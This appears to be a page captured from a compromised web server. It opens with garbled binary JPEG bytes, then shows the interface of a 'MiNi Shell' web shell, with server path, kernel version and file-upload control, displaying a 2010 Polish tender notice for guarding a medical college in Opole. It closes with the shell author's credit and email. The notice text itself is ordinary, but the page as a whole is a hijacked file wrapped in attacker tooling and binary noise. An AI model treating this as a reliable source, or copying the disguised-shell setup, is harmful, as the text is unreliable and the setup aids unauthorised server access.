JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100928/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100928/266817-N-2010.html

<p class="kh_header"><b>Opole: Przetarg nieograniczony na usługę ochrony obiektów Państwowej Medycznej Wyższej Szkoły Zawodowej w Opolu (nr sprawy: OPZ-381-11/10)</b><br>
<b>Numer ogłoszenia: 266817 - 2010; data zamieszczenia: 28.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Medyczna Wyższa Szkoła Zawodowa w Opolu , ul. Katowicka 68, 45-060 Opole, woj. opolskie, tel. 077 4423524, 4423520, faks 077 4423517.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.wsm.opole.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na usługę ochrony obiektów Państwowej Medycznej Wyższej Szkoły Zawodowej w Opolu (nr sprawy: OPZ-381-11/10).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1).Przedmiotem zamówienia jest całodobowa zewnętrzna i wewnętrzna ochrona obiektów i mienia Państwowej Medycznej Wyższej Szkoły Zawodowej oraz osób znajdujących się na tych obiektach, przez prowadzenie dozoru fizycznego w postaci ochroniarzy z zastosowaniem grupy interwencyjnej. 
2).Przedmiot zamówienia obejmuje w szczególności:
a).obsługę portierni w budynku ośmiokondygnacyjnym przez jednego ochroniarza (licencja dla ochroniarza nie jest wymagana) - 24 godziny na dobę; 
b).obsługę szatni w budynku rektoratu przez jednego ochroniarza (licencja dla ochroniarza nie jest wymagana) - od godziny 7:30 do godziny 19:45, w każdy dzień tygodnia za wyjątkiem świąt ustawowo wolnych od pracy. W okresie lipiec - wrzesień obsługa szatni od 7:30 do 15:30; 
c).obsługę szatni w Sali audytoryjnej przez jednego ochroniarza (licencja dla ochroniarza nie jest wymagana) - od godziny 7:30 do godziny 19:30, w każdy dzień tygodnia za wyjątkiem świąt ustawowo wolnych od pracy. W okresie lipiec - wrzesień obsługa szatni od 7:30 do 15:30; 
d).dyżur grupy interwencyjnej 24 godziny na dobę;
e).całodobowe monitorowanie systemu alarmowego (antywłamaniowego; p-poż;). zainstalowanych w obiekcie Zamawiającego, przeszkolenie ochrony w obsłudze tych systemów dokonuje Wykonawca na swój koszt; 
f).całodobowa obsługa centrali telefonicznej;
g).ochronę obiektów przed wszelkiego rodzaju czynami zabronionymi i przyczynami pożarów;
h).w razie zagrożenia niezwłoczne reagowanie poprzez:
- wysłanie grupy interwencyjnej, w składzie minimum 2 osób wyposażonej w niezbędne środki techniczne, która zobowiązana jest do dotarcia do obiektu chronionego w czasie nie przekraczającym dziesięciu minut od otrzymania sygnału, celem rozpoczęcia działań zabezpieczających obiekt,
- niezwłoczne powiadamianie o zagrożeniu Zamawiającego, a także w przypadkach wymagających interwencji, specjalistycznych służb miejskich (Straż Pożarna, Policja, Pogotowie Ratunkowe, Straż Miejska),
- zabezpieczanie obiektu do czasu przybycia służb, o których mowa wyżej, bądź osób reprezentujących Zamawiającego,
i). codzienne dokonywanie kontrolnych obchodów obiektów Zamawiającego na zewnątrz i wewnątrz w celu sprawdzenia:
- zabezpieczenia obiektów i terenu Zamawiającego przed dostępem osób postronnych ( w tym zamknięcia bram, garaży);
- stanu ogrodzenia terenu, tablic informacyjnych, masztów wraz z flagami;
2.1). Zakres szczegółowych obowiązków ochroniarza na portierni:
a). pełnienie bezpośredniego dozoru nad powierzonym do ochrony mieniem Zamawiającego i w tym zakresie, po przyjęciu dyżuru od poprzednika, zapoznanie się z wpisami do książki dyżurów o stwierdzonych nieprawidłowościach w zakresie ochrony mienia oraz wpisywanie własnych zastrzeżeń;
b). sprawowanie pieczy nad kluczami znajdującymi się w pomieszczeniach portierni, w tym ich wydawanie i prowadzenie rejestru z wpisaniem godziny pobrania i zdania klucza;
c). zakończenie dyżuru po uprzednim zdaniu stanowiska zmiennikowi;
d). wydawanie i odbieranie sprzętu multimedialnego, który jest przechowywany w szafie metalowej przy portierni prowadzącej rejestr wydanego sprzętu;
e). wykonywanie w zakresie ochrony poleceń osoby upoważnionej przez Zamawiającego do kontaktów z Wykonawcą,
f). kontrola ruchu osób wchodzących i wychodzących z budynku Zamawiającego, w tym:
- wpisywanie do rejestru osób wchodzących do obiektu (spisanie danych z dowodu osobistego, daty i godziny przyjścia i wyjścia);
- powiadamianie pracowników Uczelni o przyjściu do nich osób z zewnątrz;
g). kontrolowanie funkcjonowania elektronicznego systemu zabezpieczenia p-poż oraz antywłamaniowego;
h). zatrzymanie osób stwarzających w sposób bezpośredni zagrożenie dla życia lub zdrowia ludzkiego, a także dla chronionego mienia w celu niezwłocznego przekazania tych osób Policji;
i). zapalanie i wygaszanie oświetlenia wewnętrznego i zewnętrznego (nocnego).
j). kontrola na zewnątrz obiektów w obrębie terenu Zamawiającego, w szczególności w postaci obchodów tego terenu w godzinach od 16:00 do 7:00; 
2.2). Zakres szczegółowych obowiązków ochroniarza w szatni:
a). obsługa szatni;
b). włączanie klimatyzacji na salę audytoryjną;
c). wymiana baterii akumulatorków w mikrofonie;
d). obchód wewnątrz dozorowanego obiektu zamawiającego w sytuacji wolnego dnia od zajęć dydaktycznych;
e). wspomaganie ochroniarza na portierni w sytuacji zagrożenia życia lub zdrowia osób przebywających w obiekcie uczelni.
2.3). Zakres szczegółowych obowiązków grupy interwencyjnej  :
- interwencja na każde wezwanie ochroniarzy określonych w pkt.2 lit.a - c [niniejszego pola];
- w trakcie interwencji należy postępować zgodnie z ustawą o ochronie osób i mienia.
3). Informacje dodatkowe:
a). w obiekcie zamawiającego jest instalacja ochrony alarmu p-poż, centrala telefoniczna, lokalny system alarmowy. Ochroną objęty jest cały obiekt Zamawiającego. Urządzenia przekazujące sygnały alarmowe p-poż i ochrony, centrala telefoniczna znajdują się przy portierni; 
b). personel wykonawcy musi być przeszkolony z obsługi urządzeń będących na portierni przez Wykonawcę na swój koszt;
c). zamawiający nie jest wpisany do rejestru wojewody jako obiekt podlegający obowiązkowej ochronie, zgodnie z art. 5 ustawy z dn. 22 sierpnia 1997 r. o ochronie osób i mienia (Dz.U. 1997 Nr 114 póz. 740 z późn. zm.).
d). pracownicy ochrony muszą wykonywać swoje obowiązki zgodnie:
- z ustawą z dnia 22 sierpnia 1997 r. o ochronie osób i mienia (Dz.U. 1997 Nr 114 póz. 740 z późn. zm.), oraz
- z regulaminem zamawiającego dotyczącym pracy portierni
- z regulaminem zamawiającego dotyczącym Domu Studenta mieszczącego się w ochranianym obiekcie.
e). Zamawiający będzie podawał aktualne grafiki zajęć dydaktycznych do wiadomości personelu Wykonawcy wykonującego usługi z zakresu przedmiotu zamówienia. Dotychczas administracja zamawiającego pracuje od godziny 7:30 do 15:30 w dni ustawowo robocze oraz w dodatkowe dni ustalone przez Rektora uczelni. Zajęcia dydaktyczne odbywają się od godziny 8:00 do 19:45;
f). Przed przystąpieniem do wykonania przedmiotu umowy Zamawiający zapozna  przedstawiciela Wykonawcy (o którym mowa w §4 ust.3 załącznika nr 3 do SIWZ) z obsługą systemów alarmowych (p-poż, antywłamaniowych); 
4). Ogólne warunki płatności:
a). płatność z dołu za każdy miesiąc wykonanej usługi; 
b). przelewem na konto Wykonawcy; 
c). termin płatności: 21 dni od daty przedstawieniu faktury zamawiającemu, wystawionej najwcześniej w pierwszy kalendarzowy dzień roboczy miesiąca za poprzedni miesiąc realizacji usługi..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla potwierdzenia warunku posiadania uprawnienia do wykonywania działalności gospodarczej, wykonawca wykaże, iż posiada wymagane przez prawo aktualną koncesję na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia wydaną przez Ministra MSWiA zgodnie z ustawą z 22.08.1997r. o ochronie osób i mienia (Dz U z 1997r. Nr 114 poz.740 z póź. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla potwierdzenia wiedzy i doświadczenia potrzebnego do wykonania zamówienia w zakresie pkt. 3 SIWZ, wykonawca wykaże, iż on, lub jego podwykonawca - w sytuacji o której mowa w art. 26 pkt.2b ustawy Prawo Zamówień Publicznych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,  wykonał, (lub wykonuje nadal), co najmniej jedno zamówienie na ciągłą usługę ochrony obiektów, którego okres realizacji wynosił (wynosi) co najmniej 18 miesięcy a wartość zamówienia przekroczyła 150.000,00 z podatkiem VAT za pierwsze wykonane 12 miesięcy realizacji umowy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełniania warunków udziału w postępowaniu, gdyż nie wymaga dokumentów na potwierdzenie spełniania warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje sposobu dokonywania oceny spełniania warunków udziału w postępowaniu, gdyż nie wymaga dokumentów na potwierdzenie spełniania warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla potwierdzenia swej sytuacji ekonomicznej zapewniającej wykonanie zamówienia, wykonawca wykaże, że posiada ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia. - Wartość ubezpieczenia minimum 50.000,00 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1).Zmiany w obowiązujących przepisach prawa mające wpływ na przedmiot i warunki umowy (z wyłączeniem warunków w umowie dotyczących składników wynagrodzenia brutto wykonawcy innych niż podatek VAT i z zastrzeżeniem pkt. 3 [niniejszego pola] oraz zmiana sytuacji prawnej lub faktycznej Zamawiającego, skutkująca niemożnością realizacji przedmiotu umowy.
2).Zmiana miesięcznego wynagrodzenia o wzrost, lub obniżenie, obowiązującej stawki podatku VAT dla świadczonej usługi będącej przedmiotem zamówienia,  zmiana wynagrodzenia nastąpi od dnia  obowiązywania nowej stawki VAT.
3).Waloryzacja miesięcznego wynagrodzenia netto (bez podatku VAT) o średnioroczny wskaźnik cen towarów i usług konsumpcyjnych ogółem podawany w corocznym komunikacie Prezesa Głównego Urzędu Statystycznego w sprawie średniorocznego wskaźnika cen towarów i usług konsumpcyjnych ogółem w poprzednim roku kalendarzowym, - w stosunku do aktualnego roku świadczenia przedmiotu umowy. Waloryzacji nie podlega usługa świadczona w rok 2010.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.wsm.opole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowa Medyczna Wyższa Szkoła Zawodowa w Opolu, ul. Katowicka 68, pokój 105, I piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.10.2010 godzina 10:00, miejsce: Państwowa Medyczna Wyższa Szkoła Zawodowa w Opolu, ul. Katowicka 68, pokój 102, I piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1).W celu rozeznania wyglądu obiektów przeznaczonych do ochrony, zamawiający dopuszcza, aby wykonawca dokonał wizji lokalnej tych obiektów. 
W tym celu wykonawca winien się skontaktować z Kanclerzem PMWSZ w Opolu, w dni robocze od poniedziałku do piątku, pomiędzy godziną 10:00 a 14:00, telefonicznie pod numerem (077) 44 23 517 lub osobiście w pokoju nr 102 I piętro w siedzibie zamawiającego, celem umówienia się na wizje lokalną. Wizja lokalna może być zaplanowana i odbyta tylko do dnia poprzedzającego dzień otwarcia ofert. 
2). Wykonawca, przy powoływaniu się w pkt. III.3 [ogłoszenia] na wiedzę i doświadczenie podwykonawcy, powinien pamiętać o obowiązku udowodnienia zamawiającemu dysponowania zasobami podwykonawcy niezbędnymi do realizacji zamówienia, zgodnie z art. 26 ust.2b ustawy Prawo Zamówień Publicznych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com